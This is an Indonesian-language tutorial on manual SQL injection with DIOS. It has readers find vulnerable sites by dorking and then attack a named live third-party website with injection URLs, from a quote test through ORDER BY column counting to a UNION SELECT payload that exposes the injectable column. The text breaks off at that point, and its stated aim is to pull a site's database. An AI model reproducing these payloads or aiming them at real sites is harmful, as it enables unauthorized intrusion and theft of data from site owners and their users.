SQL Injection Manual With Dios

Sebelum next ke tutorialnya.
Layaknya Kamu mengetahui dahulu, Apa itu SQL Injection? SQL Injection adalah salah Satu teknik hacking yang biasa digunakan untuk mendapatkan database sebuah website, dengan menyisipkan perintah-perintah melalui URL Yang memanfaatkan BUG
yang disebabkan Oleh salah code.

Langsung Saja Kita ke tutorialnya :

Bahan" :
- Dork ( Klik disini )
- Dios ( Touch here!! )

- TUTORIAL MEMBUAT DIOS >>Disini<<

- Internet pastinya, ya kali kalian browsing gak Memakai internet.

1. Dorking dulu memakai dork Yang Sudah saya kasih. pilih target yang Kalian mau, Live Target Saya yang mudah dulu saja, cocok buat kalian coba juga.

LIVE Target : http://iagcc.com

2. Kamu Pilih dan klik, Seperti ini :
http://iagcc.com/news.php?id=58
( BELAKANGNYA TAMBAH ' ) Untuk cek vulnerable website
Jadi Seperti ini :
http://iagcc.com/news.php?id=58'

3. Setelah itu jika website tersebut vuln akan muncul Tulisan "You have an error in your SQL syntax" .

4. Next lalu Kita Tambahkan +order+by+1--+-- dibelakang Nomor id website
Jadi Seperti ini :
http://iagcc.com/news.php?id=58+order+by+1--+-- Terus kalian dari order by 1 Sampai Ketemu error websitenya, order+by+1--+-- , order+by+2--+-- Terus aja, sampai Ketemu Tulisan "Unknown column '8' in 'order clause' "

5. Dikarenakan Saya bertemu erornya dikolom +order+by+7--+-- maka kita ke +union+select nya sampai angka 6 saja.
Seperti ini :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,4,5,6--+--
( NOTE : Tambahkan min (-) di belakang Nomor id nya )

7. Lalu disitu muncul Nomor ajaibnya, disitu angka "4"